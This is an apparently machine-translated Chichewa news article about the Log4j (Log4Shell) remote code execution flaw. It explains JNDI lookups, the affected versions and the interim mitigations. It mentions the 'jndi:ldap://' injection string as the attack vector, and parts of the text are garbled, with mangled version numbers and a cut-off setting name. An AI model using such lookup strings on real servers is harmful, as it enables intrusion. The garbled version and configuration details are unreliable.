Obera akupitilizabe kugwiritsa ntchito zolakwika mu Log4J

Mdima wamdima Kusinthidwa

Palibe ndemanga

Pakhala pali zokambidwa zambiri pa ukonde za kusatetezeka mu Log4J yomwe imalola wowukira kuti ayambitse ma code achinsinsi patali ngati mutha kutumiza deta ku pulogalamu yomwe imagwiritsa ntchito laibulale ya log4j kuti mulembe zochitikazo.

Kuukira kumeneku zitha kuchitika popanda kutsimikiziridwaMwachitsanzo, pogwiritsa ntchito tsamba lovomerezeka lomwe limasunga zolakwika zotsimikizira.

Cholakwika ichi chapangitsa makampani odziwa zachitetezo cha cybersecurity kuti agwire ntchitoyo ndipo zikuwonetsa kuti ziwopsezo zomwe zimatengera mwayi pachiwonetserochi zikuchulukirachulukira.

Mamembala a Apache Software Foundation yapanga chigamba pofuna kukonza chiwopsezocho ndipo ndi mtundu wa 2.15.0, kuphatikiza kuti njira zomwe zingatheke zadziwikanso kuti zichepetse zoopsa.

Kodi Apache Log4j ndi chiyani? Kodi vuto ndi lalikulu bwanji?

Kwa amene sakudziwabe kuti vutoli ndi lalikulu bwanji, ndikuuzeni Pa Disembala 9, chiwopsezo chinapezeka mu lkujambula laibulale chipi4j Apache.

Laibulale iyi amagwiritsidwa ntchito kwambiri pama projekiti opititsa patsogolo ntchito Java / J2EE komanso Java / J2EE-based standard solution solutions.

chipi4j ikuphatikiza njira yofufuzira yomwe ingagwiritsidwe ntchito kufunsa kudzera mu syntax yapadera mu chingwe chamtundu. Mwachitsanzo, itha kugwiritsidwa ntchito popempha magawo osiyanasiyana monga mtundu wa Java chilengedwe kudzera $ {java: version} etc.

Kenako tchulani kiyi ya jndi mu chingwe, njira yofufuzira gwiritsani ntchito JNDI API. Mwachikhazikitso, zopempha zonse zimapangidwa ndi prefix java: comp / env / *; komabe, olembawo adagwiritsa ntchito mwayi wogwiritsa ntchito chiwongolero chachikhalidwe pogwiritsa ntchito colon mu kiyi.

Apa ndi pamene chiwopsezo chagona: sijndi: ldap: // imagwiritsidwa ntchito ngati kiyi, pempho limapita ku seva yodziwika ya LDAP. Njira zina zoyankhulirana monga LDAPS, DNS, ndi RMI zitha kugwiritsidwanso ntchito.

Chifukwa chake, seva yakutali yoyendetsedwa ndi wowukirayo imatha kubweza chinthu ku seva yomwe ili pachiwopsezo, zomwe zingayambitse kupha ma code padongosolo kapena kutayikira kwachinsinsi.

Zomwe wowukira ayenera kuchita ndikutumiza chingwe chapadera Kupyolera mu makina omwe amalemba chingwechi ku fayilo ya chipika ndipo amayendetsedwa ndi laibulale ya Log4j.

Izi zitha kuchitika ndi zopempha zosavuta za HTTP, mwachitsanzo zomwe zimatumizidwa kudzera pa mafomu a intaneti, magawo a data, ndi zina zambiri, kapena ndi mtundu wina uliwonse wolumikizana pogwiritsa ntchito kulembetsa mbali ya seva.

Tenable adawonetsa kusatetezeka ngati "chiwopsezo chofunikira kwambiri pazaka khumi zapitazi."

Umboni wa lingaliro lasindikizidwa kale. Chiwopsezochi tsopano chikugwiritsidwa ntchito mwachangu.

Kuopsa kwachiwopsezo ndi Zolemba malire za 10 pamlingo wa CVSS.

Nawu mndandanda wamakina omwe akhudzidwa:

  • Apache Log4j mitundu 2.0 mpaka 2.14.1
  • Apache Log4j mitundu 1.x (matembenuzidwe achikale) malinga ndi kasinthidwe kapadera.
  • Zogulitsa zomwe zimagwiritsa ntchito mtundu wosatetezeka wa Apache Log4j - Ma CERT aku Europe amakhala ndi mndandanda wazinthu zonse komanso momwe ali pachiwopsezo.

CERT-FR imalimbikitsa kusanthula mwatsatanetsatane zipika za netiweki. Zifukwa zotsatirazi zitha kugwiritsidwa ntchito kuzindikira kuyesa kugwiritsa ntchito chiwopsezochi mukamagwiritsa ntchito ma URL kapena mitu ina ya HTTP ngati wothandizira.

Pomaliza ndi bwino kutchula zimenezo tikulimbikitsidwa kugwiritsa ntchito log2.15.0j version 4 posachedwa.

Komabe, zikavuta kusamukira kumtunduwu, njira zotsatirazi zitha kugwiritsidwa ntchito kwakanthawi:
Kwa mapulogalamu ogwiritsira ntchito 2.7.0 ndi pambuyo pake laibulale ya log4j, ndizotheka kuteteza ku chiwonongeko chilichonse mwa kusintha mawonekedwe a zochitika zomwe zidzalowetsedwe ndi syntax% m {nolookups} pa data yomwe wogwiritsa ntchitoyo angapereke.

Kusintha uku kumafuna kusintha fayilo yosinthika ya log4j kuti ipange mawonekedwe atsopano. Chifukwa chake, izi zimafunikira kukonzanso njira zotsimikizira zaukadaulo ndi ntchito musanatumize mtundu watsopanowu.

Kwa mapulogalamu ogwiritsira ntchito 2.10.0 ndi pambuyo pake laibulale ya log4j, ndizothekanso kuteteza ku chiwonongeko chilichonse mwa kusintha configuration parameter log4j2.formatMsgNoLo


Zomwe zili m'nkhaniyi zikutsatira mfundo zathu za malamulo okonzekera. Kuti mufotokoze cholakwika dinani Apa.

Khalani oyamba kuyankha

Siyani ndemanga yanu

Anu email sati lofalitsidwa. Amafuna minda amalembedwa ndi *

*

*

  1. Wotsogolera pazosankhazi: Miguel Ángel Gatón
  2. Cholinga cha deta: Control SPAM, kasamalidwe ka ndemanga.
  3. Kukhazikitsa: Kuvomereza kwanu
  4. Kulumikizana kwa zomwe zafotokozedwazo: Zomwezo siziziwululidwa kwa anthu ena kupatula pakukakamizidwa mwalamulo.
  5. Zosunga: Zosungidwa ndi Occentus Networks (EU)
  6. Ufulu: Nthawi iliyonse mutha kuchepetsa, kuchira ndikuchotsa zidziwitso zanu.